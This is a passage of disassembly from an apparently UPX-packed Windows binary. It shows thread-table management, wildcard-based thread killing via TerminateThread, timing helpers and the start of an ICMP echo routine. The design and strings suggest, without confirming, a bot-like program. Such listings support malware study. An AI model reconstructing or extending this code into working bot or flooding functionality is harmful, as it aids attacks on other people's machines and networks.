jmp short locret_4092A2
; ---------------------------------------------------------------------------
loc_40928E: ; CODE XREF: sub_409226+1E�j
; sub_409226+26�j ...
call ds:dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ds:dword_41E3A0, eax
locret_4092A2: ; CODE XREF: sub_409226+66�j
leave
retn
sub_409226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4092A4 proc near ; CODE XREF: sub_4083AD+61�p
; sub_40A9CF+1CCA�p ...
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call ds:dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call ds:dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409307
jg short loc_4092CC
cmp [ebp+var_8], 0
jbe short loc_409307
loc_4092CC: ; CODE XREF: sub_4092A4+20�j
cmp [ebp+var_C], 0
jl short loc_409307
jg short loc_4092DA
cmp [ebp+var_10], 0
jbe short loc_409307
loc_4092DA: ; CODE XREF: sub_4092A4+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
jmp short locret_409316
; ---------------------------------------------------------------------------
loc_409307: ; CODE XREF: sub_4092A4+1E�j
; sub_4092A4+26�j ...
call ds:dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
locret_409316: ; CODE XREF: sub_4092A4+61�j
leave
retn
sub_4092A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409318 proc near ; CODE XREF: sub_408B30:loc_408BBC�p
; sub_40A9CF:loc_40C715�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call ds:dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call ds:dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409381
jg short loc_409340
cmp [ebp+var_8], 0
jbe short loc_409381
loc_409340: ; CODE XREF: sub_409318+20�j
cmp [ebp+var_C], 0
jl short loc_409381
jg short loc_40934E
cmp [ebp+var_10], 0
jbe short loc_409381
loc_40934E: ; CODE XREF: sub_409318+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
sub eax, ds:dword_41E3A0
jmp short locret_40938D
; ---------------------------------------------------------------------------
loc_409381: ; CODE XREF: sub_409318+1E�j
; sub_409318+26�j ...
call ds:dword_4170D0 ; GetTickCount
sub eax, ds:dword_41E3A0
locret_40938D: ; CODE XREF: sub_409318+67�j
leave
retn
sub_409318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40938F proc near ; CODE XREF: UPX0:004168C6�p
push ebp
mov ebp, esp
and ds:dword_41E3C0, 0
push 1980h
call sub_416B46 ; malloc
pop ecx
mov ds:dword_41E3C8, eax
push offset dword_41E3A8
call sub_409C36
pop ecx
pop ebp
retn
sub_40938F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4093B6 proc near ; DATA XREF: sub_409479+35�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417278
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_20], 0
and [ebp+var_1C], 0
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_1C], eax
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push [ebp+var_20]
call ds:dword_4170DC ; IsBadCodePtr
test eax, eax
jz short loc_409431
cmp ds:dword_41DF08, 0
jz short loc_40942F
push [ebp+var_20]
push offset dword_419474
push offset dword_41DB88
call sub_40D4AB
add esp, 0Ch
loc_40942F: ; CODE XREF: sub_4093B6+62�j
jmp short loc_409443
; ---------------------------------------------------------------------------
loc_409431: ; CODE XREF: sub_4093B6+59�j
push [ebp+var_1C]
call [ebp+var_20]
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_24]
jmp short loc_409468
; ---------------------------------------------------------------------------
loc_409443: ; CODE XREF: sub_4093B6:loc_40942F�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_409466
; ---------------------------------------------------------------------------
push offset aBtg ; "btg"
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_409466: ; CODE XREF: sub_4093B6+91�j
xor eax, eax
loc_409468: ; CODE XREF: sub_4093B6+8B�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4093B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409479 proc near ; CODE XREF: sub_40764D+14A�p
; sub_409BF1+2F�p ...
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 8
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_409494
xor eax, eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_409494: ; CODE XREF: sub_409479+15�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
lea eax, [ebp+var_8]
push eax
push 0
push [ebp+var_C]
push offset sub_4093B6
push 20000h
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4094D9
push [ebp+var_4]
call ds:dword_4170A4 ; CloseHandle
push 1
pop eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_4094D9: ; CODE XREF: sub_409479+50�j
push [ebp+var_C]
call sub_416B4C ; free
pop ecx
xor eax, eax
locret_4094E4: ; CODE XREF: sub_409479+19�j
; sub_409479+5E�j
leave
retn
sub_409479 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4094E6 proc near ; DATA XREF: sub_4095A4+159�o
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_19B = byte ptr -19Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417288
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov al, ds:byte_41DF00
mov [ebp+var_19C], al
push 60h
pop ecx
xor eax, eax
lea edi, [ebp+var_19B]
rep stosd
stosw
stosb
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax+10h]
mov [ebp+var_1A0], eax
mov eax, [ebp+arg_0]
mov eax, [eax]
add eax, 14h
push eax
lea eax, [ebp+var_19C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push [ebp+arg_0]
mov eax, [ebp+arg_0]
mov eax, [eax]
call dword ptr [eax+10h]
mov [ebp+var_1A4], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_1A4]
jmp short loc_409593
; ---------------------------------------------------------------------------
lea eax, [ebp+var_19C]
push eax
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor eax, eax
loc_409593: ; CODE XREF: sub_4094E6+8A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4094E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095A4 proc near ; CODE XREF: sub_4017AA+A2�p
; sub_401D6E+8D�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push offset dword_41E3A8
call sub_409C6C
pop ecx
cmp ds:dword_41E3C0, 10h
jnz short loc_4095D9
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E3A8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_4095D9: ; CODE XREF: sub_4095A4+18�j
cmp [ebp+arg_8], 0
jz short loc_409627
and [ebp+var_10], 0
jmp short loc_4095EC
; ---------------------------------------------------------------------------
loc_4095E5: ; CODE XREF: sub_4095A4:loc_409625�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4095EC: ; CODE XREF: sub_4095A4+3F�j
cmp [ebp+var_10], 10h
jge short loc_409627
mov eax, [ebp+var_10]
imul eax, 198h
mov ecx, ds:dword_41E3C8
mov eax, [ecx+eax+10h]
cmp eax, [ebp+arg_0]
jnz short loc_409625
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E3A8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409625: ; CODE XREF: sub_4095A4+64�j
jmp short loc_4095E5
; ---------------------------------------------------------------------------
loc_409627: ; CODE XREF: sub_4095A4+39�j
; sub_4095A4+4C�j
and [ebp+var_C], 0
and [ebp+var_8], 0
jmp short loc_409638
; ---------------------------------------------------------------------------
loc_409631: ; CODE XREF: sub_4095A4:loc_409672�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_409638: ; CODE XREF: sub_4095A4+8B�j
cmp [ebp+var_8], 10h
jge short loc_409674
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+8], 0
jnz short loc_409672
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, ds:dword_41E3C8
add ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_409674
; ---------------------------------------------------------------------------
loc_409672: ; CODE XREF: sub_4095A4+AE�j
jmp short loc_409631
; ---------------------------------------------------------------------------
loc_409674: ; CODE XREF: sub_4095A4+98�j
; sub_4095A4+CC�j
cmp [ebp+var_C], 0
jnz short loc_409695
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E3A8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409695: ; CODE XREF: sub_4095A4+D4�j
cmp [ebp+arg_4], 0
jz short loc_4096A3
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov [eax], ecx
loc_4096A3: ; CODE XREF: sub_4095A4+F5�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax+10h], ecx
lea eax, [ebp+arg_10]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_C]
mov eax, [ebp+var_C]
add eax, 14h
push eax
call sub_416DC6 ; vsprintf
add esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+var_C]
and dword ptr [eax+4], 0
mov eax, ds:dword_41E3C0
inc eax
mov ds:dword_41E3C0, eax
cmp [ebp+arg_4], 0
jz short loc_4096EB
mov eax, [ebp+arg_4]
mov [ebp+var_14], eax
jmp short loc_4096F1
; ---------------------------------------------------------------------------
loc_4096EB: ; CODE XREF: sub_4095A4+13D�j
mov eax, [ebp+var_C]
mov [ebp+var_14], eax
loc_4096F1: ; CODE XREF: sub_4095A4+145�j
mov eax, [ebp+var_C]
add eax, 0Ch
push eax
push 0
push [ebp+var_14]
push offset sub_4094E6
push 0
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov ecx, [ebp+var_C]
mov [ecx+8], eax
mov eax, [ebp+var_C]
cmp dword ptr [eax+8], 0
jnz short loc_409753
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
mov eax, ds:dword_41E3C0
dec eax
mov ds:dword_41E3C0, eax
push 198h
push 0
lea eax, [ebp+var_C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E3A8
call sub_409C7A
pop ecx
xor eax, eax
jmp short locret_409761
; ---------------------------------------------------------------------------
loc_409753: ; CODE XREF: sub_4095A4+177�j
push offset dword_41E3A8
call sub_409C7A
pop ecx
push 1
pop eax
locret_409761: ; CODE XREF: sub_4095A4+30�j
; sub_4095A4+7C�j ...
leave
retn
sub_4095A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409763 proc near ; CODE XREF: sub_401244+73�p
; sub_401244+547�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push offset dword_41E3A8
call sub_409C6C
pop ecx
mov eax, ds:dword_41E3C0
dec eax
mov ds:dword_41E3C0, eax
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_4170A4 ; CloseHandle
push 198h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E3A8
call sub_409C7A
pop ecx
pop ebp
retn
sub_409763 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4097A7 proc near ; CODE XREF: sub_40A9CF+EBF�p
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
cmp [ebp+arg_0], 0
jnz short loc_4097BB
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_4097BB: ; CODE XREF: sub_4097A7+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_409825
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E3A8
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+8], 0
jz short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
mov dword ptr [ecx+eax+4], 1
loc_409815: ; CODE XREF: sub_4097A7+3F�j
; sub_4097A7+55�j
push offset dword_41E3A8
call sub_409C7A
pop ecx
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_409825: ; CODE XREF: sub_4097A7+22�j
push [ebp+arg_0]
push offset aS ; "*%s*"
push 185h
lea eax, [ebp+var_190]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E3A8
call sub_409C6C
pop ecx
mov eax, ds:dword_41E3C0
mov [ebp+var_8], eax
and [ebp+var_194], 0
jmp short loc_40986A
; ---------------------------------------------------------------------------
loc_40985D: ; CODE XREF: sub_4097A7:loc_4098E1�j
mov eax, [ebp+var_194]
inc eax
mov [ebp+var_194], eax
loc_40986A: ; CODE XREF: sub_4097A7+B4�j
cmp [ebp+var_194], 10h
jnb short loc_4098E6
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+8], 0
jz short loc_4098E1
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
lea eax, [ebp+var_190]
push eax
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, ds:dword_41E3C8
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_4098D9
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, ds:dword_41E3C8
mov dword ptr [ecx+eax+4], 1
loc_4098D9: ; CODE XREF: sub_4097A7+116�j
cmp [ebp+var_8], 0
jnz short loc_4098E1
jmp short loc_4098E6
; ---------------------------------------------------------------------------
loc_4098E1: ; CODE XREF: sub_4097A7+E3�j
; sub_4097A7+136�j
jmp loc_40985D
; ---------------------------------------------------------------------------
loc_4098E6: ; CODE XREF: sub_4097A7+CA�j
; sub_4097A7+138�j
push offset dword_41E3A8
call sub_409C7A
pop ecx
locret_4098F1: ; CODE XREF: sub_4097A7+F�j
; sub_4097A7+79�j
leave
retn
sub_4097A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098F3 proc near ; CODE XREF: sub_40A9CF+F13�p
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_194 = byte ptr -194h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 19Ch
cmp [ebp+arg_0], 0
jnz short loc_409907
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_409907: ; CODE XREF: sub_4098F3+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz loc_4099B4
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E3A8
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_4099A4
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+8], 0
jz short loc_4099A4
mov eax, ds:dword_41E3C0
dec eax
mov ds:dword_41E3C0, eax
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
mov eax, [ecx+eax+8]
mov [ebp+var_8], eax
push 198h
push 0
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_8]
call ds:dword_4170E0 ; TerminateThread
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
loc_4099A4: ; CODE XREF: sub_4098F3+43�j
; sub_4098F3+59�j
push offset dword_41E3A8
call sub_409C7A
pop ecx
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_4099B4: ; CODE XREF: sub_4098F3+22�j
push [ebp+arg_0]
push offset aS ; "*%s*"
push 185h
lea eax, [ebp+var_194]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E3A8
call sub_409C6C
pop ecx
mov eax, ds:dword_41E3C0
mov [ebp+var_C], eax
and [ebp+var_198], 0
jmp short loc_4099F9
; ---------------------------------------------------------------------------
loc_4099EC: ; CODE XREF: sub_4098F3:loc_409AC3�j
mov eax, [ebp+var_198]
inc eax
mov [ebp+var_198], eax
loc_4099F9: ; CODE XREF: sub_4098F3+F7�j
cmp [ebp+var_198], 10h
jnb loc_409AC8
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+8], 0
jz loc_409AC3
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
lea eax, [ebp+var_194]
push eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, ds:dword_41E3C8
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_409ABB
mov eax, ds:dword_41E3C0
dec eax
mov ds:dword_41E3C0, eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, ds:dword_41E3C8
mov eax, [ecx+eax+8]
mov [ebp+var_19C], eax
push 198h
push 0
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, ds:dword_41E3C8
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_19C]
call ds:dword_4170E0 ; TerminateThread
push [ebp+var_19C]
call ds:dword_4170A4 ; CloseHandle
loc_409ABB: ; CODE XREF: sub_4098F3+161�j
cmp [ebp+var_C], 0
jnz short loc_409AC3
jmp short loc_409AC8
; ---------------------------------------------------------------------------
loc_409AC3: ; CODE XREF: sub_4098F3+12A�j
; sub_4098F3+1CC�j
jmp loc_4099EC
; ---------------------------------------------------------------------------
loc_409AC8: ; CODE XREF: sub_4098F3+10D�j
; sub_4098F3+1CE�j
push offset dword_41E3A8
call sub_409C7A
pop ecx
locret_409AD3: ; CODE XREF: sub_4098F3+F�j
; sub_4098F3+BC�j
leave
retn
sub_4098F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409AD5 proc near ; DATA XREF: sub_409BF1+2A�o
var_1A8 = byte ptr -1A8h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A8h
push 1A3h
push [ebp+arg_0]
lea eax, [ebp+var_1A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
cmp ds:dword_41E3C0, 0
jz short loc_409B25
push 10h
push ds:dword_41E3C0
push offset dword_4194EC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_409B3F
; ---------------------------------------------------------------------------
loc_409B25: ; CODE XREF: sub_409AD5+30�j
push offset dword_4194CC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
pop ecx
pop ecx
xor eax, eax
jmp locret_409BED
; ---------------------------------------------------------------------------
loc_409B3F: ; CODE XREF: sub_409AD5+4E�j
push offset dword_41E3A8
call sub_409C6C
pop ecx
and [ebp+var_10], 0
and [ebp+var_4], 0
jmp short loc_409B5B
; ---------------------------------------------------------------------------
loc_409B54: ; CODE XREF: sub_409AD5:loc_409BDB�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_409B5B: ; CODE XREF: sub_409AD5+7D�j
cmp [ebp+var_4], 10h
jge short loc_409BE0
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+8], 0
jz short loc_409BDB
push offset dword_41E3A8
call sub_409C7A
pop ecx
push 3E8h
call ds:dword_41709C ; Sleep
push offset dword_41E3A8
call sub_409C6C
pop ecx
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
lea eax, [ecx+eax+14h]
push eax
push [ebp+var_4]
push offset dword_4194BC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
add esp, 10h
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+4], 0
jz short loc_409BDB
jmp short loc_409BE0
; ---------------------------------------------------------------------------
loc_409BDB: ; CODE XREF: sub_409AD5+A0�j
; sub_409AD5+102�j
jmp loc_409B54
; ---------------------------------------------------------------------------
loc_409BE0: ; CODE XREF: sub_409AD5+8A�j
; sub_409AD5+104�j
push offset dword_41E3A8
call sub_409C7A
pop ecx
xor eax, eax
locret_409BED: ; CODE XREF: sub_409AD5+65�j
leave
retn 4
sub_409AD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BF1 proc near ; CODE XREF: sub_40A9CF+AFB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_409C0B
jmp short locret_409C34
; ---------------------------------------------------------------------------
loc_409C0B: ; CODE XREF: sub_409BF1+16�j
push [ebp+arg_0]
push [ebp+var_4]
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_0]
push offset sub_409AD5
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short locret_409C34
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
locret_409C34: ; CODE XREF: sub_409BF1+18�j
; sub_409BF1+38�j
leave
retn
sub_409BF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C36 proc near ; CODE XREF: sub_405FA3+9�p
; sub_40938F+1F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 18h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
cmp ds:dword_41DF10, 0
jz short loc_409C61
push 80000400h
push [ebp+arg_0]
call ds:dword_41DF10 ; InitializeCriticalSectionAndSpinCount
jmp short loc_409C6A
; ---------------------------------------------------------------------------
loc_409C61: ; CODE XREF: sub_409C36+19�j
push [ebp+arg_0]
call ds:dword_4170E4 ; InitializeCriticalSection
loc_409C6A: ; CODE XREF: sub_409C36+29�j
pop ebp
retn
sub_409C36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C6C proc near ; CODE XREF: sub_406041+10�p
; sub_4095A4+B�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_4170EC ; RtlEnterCriticalSection
pop ebp
retn
sub_409C6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C7A proc near ; CODE XREF: sub_406041+26�p
; sub_406041+307�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_41710C ; RtlLeaveCriticalSection
pop ebp
retn
sub_409C7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C88 proc near ; CODE XREF: sub_40332B+10�p
; sub_41113B+7ED�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xadd [esi], eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C9D proc near ; CODE XREF: sub_4042FB+17�p
; sub_4042FB+25�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xchg eax, [esi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409CB1 proc near ; CODE XREF: sub_409DD0+202�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 38h
call ds:dword_41E3CC
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_409CD8
push offset aCouldNotGetAVa ; "Could not get a valid ICMP handle\n"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_409DCE
; ---------------------------------------------------------------------------
loc_409CD8: ; CODE XREF: sub_409CB1+13�j
push 8
push 0
lea eax, [ebp+var_18]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov al, [ebp+arg_8]
mov [ebp+var_18], al
movzx eax, [ebp+arg_10]
push eax
call sub_416DD2 ; ??2@YAPAXI@Z
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_C], eax
movzx eax, [ebp+arg_10]
push eax
push 45h
push [ebp+var_C]
call sub_416B6A ; memset
add esp, 0Ch
movzx eax, [ebp+arg_10]
cmp eax, 8
jge short loc_409D26
mov [ebp+var_38], 8
jmp short loc_409D2D
; ---------------------------------------------------------------------------
loc_409D26: ; CODE XREF: sub_409CB1+6A�j
movzx eax, [ebp+arg_10]
mov [ebp+var_38], eax
loc_409D2D: ; CODE XREF: sub_409CB1+73�j
mov eax, [ebp+var_38]
add eax, 1Ch
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_416DD2 ; ??2@YAPAXI@Z
pop ecx
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
push [ebp+arg_C]
push [ebp+var_24]
push [ebp+var_10]
lea eax, [ebp+var_18]
push eax
movzx ax, [ebp+arg_10]
push eax
push [ebp+var_C]
push [ebp+arg_0]
push [ebp+var_1C]
call ds:dword_41E3D8
mov [ebp+var_20], eax
mov [ebp+var_8], 1
cmp [ebp+var_20], 1
jz short loc_409D8D
